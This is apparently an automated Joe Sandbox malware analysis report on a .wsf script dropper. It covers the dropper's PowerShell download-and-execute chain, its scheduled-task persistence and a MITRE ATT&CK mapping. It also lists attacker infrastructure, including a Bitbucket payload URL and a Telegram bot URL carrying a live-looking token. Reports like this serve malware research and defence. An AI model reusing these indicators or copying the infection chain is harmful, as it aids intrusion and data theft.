Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\System32\wscript.exeDirectory queried: C:\Users\Public\Documents\VisualsJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information222
Scripting		Valid Accounts1
Command and Scripting Interpreter		222
Scripting		111
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Data from Local System		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		Logon Script (Windows)Logon Script (Windows)111
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
System Network Configuration Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550368 Sample: FmmYUD4pt7.wsf Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 30 api.telegram.org 2->30 32 honeydew-raven-308531.hostingersite.com 2->32 34 3 other IPs or domains 2->34 44 Sigma detected: Powershell Download and Execute IEX 2->44 46 Sigma detected: WScript or CScript Dropper 2->46 48 Sigma detected: Suspicious PowerShell Parameter Substring 2->48 52 4 other signatures 2->52 9 wscript.exe 1 2->9         started        12 wscript.exe 14 2->12         started        signatures3 50 Uses the Telegram API (likely for C&C communication) 30->50 process4 dnsIp5 58 Wscript starts Powershell (via cmd or directly) 9->58 60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->60 15 cmd.exe 1 9->15         started        42 bitbucket.org 185.166.143.49, 443, 49725 AMAZON-02US Germany 12->42 62 System process connects to network (likely due to code injection or exploit) 12->62 64 VBScript performs obfuscated calls to suspicious functions 12->64 66 Suspicious powershell command line found 12->66 68 Suspicious execution chain found 12->68 18 powershell.exe 14 46 12->18         started        signatures6 process7 dnsIp8 70 Suspicious powershell command line found 15->70 72 Wscript starts Powershell (via cmd or directly) 15->72 74 Bypasses PowerShell execution policy 15->74 21 cmd.exe 1 15->21         started        24 conhost.exe 15->24         started        36 api.telegram.org 149.154.167.220, 443, 49840 TELEGRAMRU United Kingdom 18->36 38 free.cdn.hstgr.net 84.32.84.136, 443, 49777 NTT-LT-ASLT Lithuania 18->38 40 api.ipify.org 104.26.12.205, 443, 49834 CLOUDFLARENETUS United States 18->40 76 Loading BitLocker PowerShell Module 18->76 26 conhost.exe 18->26         started        signatures9 process10 signatures11 54 Suspicious powershell command line found 21->54 56 Wscript starts Powershell (via cmd or directly) 21->56 28 powershell.exe 13 21->28         started        process12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
FmmYUD4pt7.wsf5%ReversingLabsDocument-HTML.Hacktool.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://honeydew-raven-308531.hostingersite.com/moa/0%Avira URL Cloudsafe
https://honeydew-raven-308531.hostingersite.com0%Avira URL Cloudsafe
http://c.Tq0%Avira URL Cloudsafe
http://www.microsoft.cok0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bitbucket.org
185.166.143.49
truefalse
    		high
    s-part-0017.t-0009.fb-t-msedge.net
    		13.107.253.45
    		truefalse
      		high
      api.ipify.org
      		104.26.12.205
      		truefalse
        		high
        free.cdn.hstgr.net
        		84.32.84.136
        		truefalse
          		high
          api.telegram.org
          		149.154.167.220
          		truefalse
            		high
            honeydew-raven-308531.hostingersite.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010false
                		high
                https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessagefalse
                  		high
                  https://api.ipify.org/?format=textfalse
                    		high
                    https://honeydew-raven-308531.hostingersite.com/moa/true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://bitbucket.org/wscript.exe, 00000000.00000003.1407971588.00000280F38E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399915139.00000280F38F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402374098.00000280F38F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F38E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://api.ipify.org?format=textpowershell.exe, 00000003.00000002.1625600487.0000018DD72E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1625600487.0000018DD653D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1647087611.0000018DE641A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1647087611.0000018DE661E000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.orgpowershell.exe, 00000003.00000002.1625600487.0000018DD73E6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010L6wscript.exe, 00000000.00000003.1399962901.00000280F38AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F3899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407971588.00000280F3898000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1625600487.0000018DD6332000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/botpowershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1625600487.0000018DD6332000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessageppowershell.exe, 00000003.00000002.1625600487.0000018DD73E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://web-security-reports.services.atlassian.com/csp-report/bb-websitewscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://c.Tqpowershell.exe, 00000003.00000002.1655169267.0000018DEE26C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.1625600487.0000018DD838A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1625600487.0000018DD83B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bitbucket.org/Nt4wscript.exe, 00000000.00000003.1407971588.00000280F38E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399915139.00000280F38F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402374098.00000280F38F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F38E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010Twscript.exe, 00000000.00000003.1405432057.00000280F3924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netwscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010o6wscript.exe, 00000000.00000003.1399962901.00000280F38AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F3899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407971588.00000280F3898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dz8aopenkvv6s.cloudfront.netwscript.exe, 00000000.00000003.1402328512.00000280F57C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1625600487.0000018DD6332000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010Qwscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://api.ipify.orgpowershell.exe, 00000003.00000002.1625600487.0000018DD72E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.ipify.orgpowershell.exe, 00000003.00000002.1625600487.0000018DD72E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.microsoft.cokpowershell.exe, 00000003.00000002.1656756949.0000018DEE416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://remote-app-switcher.prod-east.frontend.public.atl-paas.netwscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://honeydew-raven-308531.hostingersite.compowershell.exe, 00000003.00000002.1625600487.0000018DD6332000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://api.telegram.org/bot$BotToken/sendMessagepowershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1647087611.0000018DE641A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1647087611.0000018DE661E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1625600487.0000018DD6541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.cookielaw.org/wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://aui-cdn.atlassian.com/wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010https://bitbucket.orwscript.exe, 00000000.00000003.1403020097.00000280F570A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407515414.00000280F570A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407682045.00000280F570A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402939541.00000280F56F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1403138772.00000280F570A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402220554.00000280F56C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1409135602.00000280F570A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://remote-app-switcher.stg-east.frontend.public.atl-paas.netwscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://aka.ms/pscore68powershell.exe, 00000003.00000002.1625600487.0000018DD6111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010)wscript.exe, 00000000.00000003.1405432057.00000280F3924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408967806.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010LMEMwscript.exe, 00000000.00000003.1405432057.00000280F3924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://api.telegram.orgpowershell.exe, 00000003.00000002.1625600487.0000018DD73E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1625600487.0000018DD6111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010wwscript.exe, 00000000.00000003.1405432057.00000280F3924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      149.154.167.220
                                                                                                      		api.telegram.orgUnited Kingdom
                                                                                                      		62041TELEGRAMRUfalse
                                                                                                      104.26.12.205
                                                                                                      		api.ipify.orgUnited States
                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                      185.166.143.49
                                                                                                      		bitbucket.orgGermany
                                                                                                      		16509AMAZON-02USfalse
                                                                                                      84.32.84.136
                                                                                                      		free.cdn.hstgr.netLithuania
                                                                                                      		33922NTT-LT-ASLTfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1550368
                                                                                                      Start date and time:2024-11-06 17:31:04 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 5m 43s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:14
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:FmmYUD4pt7.wsf
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:bba52d25f15d6fdad3016dd5943c794c.wsf
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.expl.evad.winWSF@13/12@4/4
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 91%
                                                                                                      • Number of executed functions: 8
                                                                                                      • Number of non-executed functions: 4
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .wsf

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: FmmYUD4pt7.wsf

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      11:32:05API Interceptor129x Sleep call for process: powershell.exe modified
                                                                                                      16:32:23Task SchedulerRun new task: MicroSoftDocumentUpgrade path: C:\ProgramData\Documents\Visuals\VcTurn.vbs

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      149.154.167.22005.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                    173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • api.ipify.org/
                                                                                                                          185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                          • jasonj002.bitbucket.io/

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          bitbucket.org2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                          • 185.166.143.50
